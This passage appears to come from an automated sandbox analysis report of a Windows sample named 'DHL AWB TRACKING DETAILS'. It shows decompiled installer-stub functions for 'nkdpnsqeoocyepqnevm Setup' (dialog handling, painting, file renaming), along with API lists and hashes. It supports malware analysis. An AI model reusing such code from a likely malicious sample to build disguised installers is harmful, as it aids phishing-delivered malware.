							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, "nkdpnsqeoocyepqnevm Setup");
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133) {
							_t142 =  *0x423678 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421498 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                    0x0040396d
                    0x00403976
                    0x00403ab7
                    0x00403abb
                    0x00403abf
                    0x00403ac1
                    0x00403ac6
                    0x00403ad1
                    0x00403adc
                    0x00403ae1
                    0x00403ae3
                    0x00403ae5
                    0x00403ae8
                    0x00403aed
                    0x00403afb
                    0x00403b08
                    0x00403b0f
                    0x00403b0f
                    0x00403b10
                    0x00403b10
                    0x00403b15
                    0x00403b1b
                    0x00403b22
                    0x00403b28
                    0x00403b2a
                    0x00403b6a
                    0x00403b6f
                    0x00403b74
                    0x00403b74
                    0x00403b79
                    0x00403b82
                    0x00403b84
                    0x00403b89
                    0x00403b8f
                    0x00403b93
                    0x00403b93
                    0x00403b98
                    0x00403b9e
                    0x00000000
                    0x00000000
                    0x00403ba4
                    0x00403ba9
                    0x00403baf
                    0x00000000
                    0x00000000
                    0x00403bb8
                    0x00403bc0
                    0x00403bc5
                    0x00403bc8
                    0x00403bce
                    0x00403bd3
                    0x00403bd6
                    0x00403bdc
                    0x00403be1
                    0x00403be4
                    0x00403bea
                    0x00403bf2
                    0x00403bf8
                    0x00403bfe
                    0x00403c02
                    0x00403c09
                    0x00403c09
                    0x00403c09
                    0x00403c13
                    0x00403c25
                    0x00403c31
                    0x00403c36
                    0x00403c40
                    0x00403c46
                    0x00403c48
                    0x00403c4d
                    0x00403c4a
                    0x00403c4a
                    0x00403c4a
                    0x00403c5d
                    0x00403c75
                    0x00403c77
                    0x00403c7d
                    0x00403c92
                    0x00403c7f
                    0x00403c88
                    0x00403c8a
                    0x00403c8a
                    0x00403c98
                    0x00403ca8
                    0x00403cb9
                    0x00403cc0
                    0x00403cc6
                    0x00403cca
                    0x00403ccf
                    0x00403cd1
                    0x00000000
                    0x00403cd7
                    0x00403cd7
                    0x00403cd9
                    0x00000000
                    0x00000000
                    0x00403cdf
                    0x00403ce3
                    0x00403d08
                    0x00403d0e
                    0x00403d14
                    0x00403d16
                    0x00000000
                    0x00000000
                    0x00403d3c
                    0x00403d42
                    0x00403d44
                    0x00403d49
                    0x00000000
                    0x00000000
                    0x00403d4f
                    0x00403d52
                    0x00403d55
                    0x00403d6c
                    0x00403d78
                    0x00403d91
                    0x00403d97
                    0x00403d9b
                    0x00403da0
                    0x00403da6
                    0x00000000
                    0x00000000
                    0x00403db0
                    0x00403dbb
                    0x00000000
                    0x00403dbb
                    0x00403ce5
                    0x00403ceb
                    0x00000000
                    0x00000000
                    0x00403cf1
                    0x00403cf7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403cfd
                    0x00403cd1
                    0x00403dc8
                    0x00403dd4
                    0x00403ddb
                    0x00000000
                    0x00403b2c
                    0x00403b2c
                    0x00403b2f
                    0x00403b62
                    0x00403b62
                    0x00403b64
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403b64
                    0x00403b31
                    0x00403b35
                    0x00403b3a
                    0x00403b3c
                    0x00000000
                    0x00000000
                    0x00403b4c
                    0x00403b54
                    0x00000000
                    0x00403b5a
                    0x00403988
                    0x00403988
                    0x0040398c
                    0x00403991
                    0x004039a0
                    0x004039a0
                    0x004039a9
                    0x004039b2
                    0x004039bd
                    0x004039bd
                    0x004039c9
                    0x004039e5
                    0x004039e8
                    0x004039fb
                    0x00403a01
                    0x00403aa4
                    0x00000000
                    0x00403aad
                    0x00403a07
                    0x00403a14
                    0x00403a16
                    0x00403a18
                    0x00403a37
                    0x00403a37
                    0x00403a3a
                    0x00403a3f
                    0x00403a42
                    0x00403a52
                    0x00403a53
                    0x00403a55
                    0x00403a8b
                    0x00403a9e
                    0x00000000
                    0x00403a9e
                    0x00403a57
                    0x00403a5d
                    0x00403a76
                    0x00403a7b
                    0x00403a7d
                    0x00000000
                    0x00000000
                    0x00403a7f
                    0x00403a6b
                    0x00403a6b
                    0x00403a6d
                    0x00403a6d
                    0x00000000
                    0x00403a6d
                    0x00403a60
                    0x00403a65
                    0x00000000
                    0x00403a65
                    0x00403a44
                    0x00403a4a
                    0x00000000
                    0x00000000
                    0x00403a4c
                    0x00000000
                    0x00403a4c
                    0x00403a3c
                    0x00000000
                    0x00403a3c
                    0x00403a22
                    0x00403a29
                    0x00403a2f
                    0x00403a31
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403a31
                    0x004039ed
                    0x00000000
                    0x004039cb
                    0x004039d1
                    0x004039db
                    0x00403de1
                    0x00403de7
                    0x00403de9
                    0x00403def
                    0x00403df4
                    0x00403dfa
                    0x00403dfa
                    0x00403def
                    0x00403e04
                    0x00000000
                    0x00403e04
                    0x004039c9

                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                    • ShowWindow.USER32(?), ref: 004039BD
                    • DestroyWindow.USER32 ref: 004039D1
                    • SetWindowLongA.USER32 ref: 004039ED
                    • GetDlgItem.USER32 ref: 00403A0E
                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                    • IsWindowEnabled.USER32(00000000), ref: 00403A29
                    • GetDlgItem.USER32 ref: 00403AD7
                    • GetDlgItem.USER32 ref: 00403AE1
                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                    • GetDlgItem.USER32 ref: 00403BF2
                    • ShowWindow.USER32(00000000,?), ref: 00403C13
                    • EnableWindow.USER32(?,?), ref: 00403C25
                    • EnableWindow.USER32(?,?), ref: 00403C40
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                    • EnableMenuItem.USER32 ref: 00403C5D
                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                    • lstrlenA.KERNEL32(00420498,?,00420498,nkdpnsqeoocyepqnevm Setup), ref: 00403CB1
                    • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                    • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                    Strings
                    • nkdpnsqeoocyepqnevm Setup, xrefs: 00403CA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                    • String ID: nkdpnsqeoocyepqnevm Setup
                    • API String ID: 184305955-110773848
                    • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                    • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                    • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                    • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403F7F Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42367c; // 0x5169b1
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423ed8; // 0x514f2c
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423eb0; // 0x50f930
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}





















                    0x00403f8f
                    0x004040b5
                    0x00404111
                    0x00404115
                    0x004041ec
                    0x004041ee
                    0x004041ee
                    0x004041f4
                    0x004041f4
                    0x004041f7
                    0x00000000
                    0x004041fe
                    0x00404123
                    0x00404125
                    0x0040412f
                    0x0040413a
                    0x0040413d
                    0x00404140
                    0x0040414b
                    0x0040414e
                    0x00404155
                    0x00404163
                    0x0040417b
                    0x00404183
                    0x0040418e
                    0x0040419e
                    0x004041a0
                    0x004041a0
                    0x00404155
                    0x004041aa
                    0x00000000
                    0x004041b5
                    0x004041b9
                    0x004041ca
                    0x004041ca
                    0x004041d0
                    0x004041de
                    0x004041de
                    0x00000000
                    0x004041e2
                    0x004041aa
                    0x004040c0
                    0x00000000
                    0x004040d4
                    0x004040d4
                    0x004040da
                    0x004040da
                    0x004040e0
                    0x00000000
                    0x00000000
                    0x00404105
                    0x00404107
                    0x0040410c
                    0x00000000
                    0x0040410c
                    0x004040c0
                    0x00403f95
                    0x00403f98
                    0x00403f9d
                    0x00403f9f
                    0x00403fae
                    0x00403fae
                    0x00403fb0
                    0x00403fb5
                    0x00403fb8
                    0x00403fba
                    0x00403fbf
                    0x00403fc8
                    0x00403fce
                    0x00403fda
                    0x00403fdd
                    0x00403fe6
                    0x00403feb
                    0x00403fee
                    0x00403ff3
                    0x0040400a
                    0x00404011
                    0x00404024
                    0x00404027
                    0x0040403c
                    0x0040403e
                    0x00404043
                    0x00404048
                    0x0040404d
                    0x0040404d
                    0x0040405c
                    0x0040406b
                    0x0040406d
                    0x00404083
                    0x00404092
                    0x00404094
                    0x00000000

                    APIs
                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
                    • GetDlgItem.USER32 ref: 0040401E
                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                    • GetSysColor.USER32(?), ref: 0040404D
                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                    • lstrlenA.KERNEL32(?), ref: 00404075
                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                    • GetDlgItem.USER32 ref: 004040F5
                    • SendMessageA.USER32(00000000), ref: 004040F8
                    • GetDlgItem.USER32 ref: 00404123
                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                    • LoadCursorA.USER32 ref: 00404172
                    • SetCursor.USER32(00000000), ref: 0040417B
                    • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                    • LoadCursorA.USER32 ref: 0040419B
                    • SetCursor.USER32(00000000), ref: 0040419E
                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                    • String ID: ,OQ$@.B$N$open
                    • API String ID: 3615053054-1034421876
                    • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                    • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                    • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                    • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0; // 0x50f930
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "nkdpnsqeoocyepqnevm Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423ea8; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                    0x0040100a
                    0x00401039
                    0x00401047
                    0x0040104d
                    0x00401051
                    0x0040105b
                    0x00401061
                    0x00401064
                    0x004010f3
                    0x00401089
                    0x0040108c
                    0x004010a6
                    0x004010bd
                    0x004010cc
                    0x004010cf
                    0x004010d5
                    0x004010d9
                    0x004010e4
                    0x004010ed
                    0x004010ef
                    0x004010ef
                    0x00401100
                    0x00401105
                    0x0040110d
                    0x00401110
                    0x00401112
                    0x00401118
                    0x0040111f
                    0x00401126
                    0x00401130
                    0x00401142
                    0x00401156
                    0x00401160
                    0x00401165
                    0x00401165
                    0x00401110
                    0x0040116e
                    0x00000000
                    0x00401178
                    0x00401010
                    0x00401013
                    0x00401015
                    0x00401019
                    0x0040101f
                    0x0040101f
                    0x00000000

                    APIs
                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,?), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextA.USER32(00000000,nkdpnsqeoocyepqnevm Setup,000000FF,00000010,00000820), ref: 00401156
                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F$nkdpnsqeoocyepqnevm Setup
                    • API String ID: 941294808-1318374105
                    • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                    • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                    • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                    • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004057D3 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t18 =  *0x423eb0; // 0x50f930
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                    0x004057d9
                    0x004057e0
                    0x004057e4
                    0x004057ed
                    0x004057f1
                    0x00405930
                    0x00405930
                    0x00000000
                    0x00405930
                    0x004057f1
                    0x004057fd
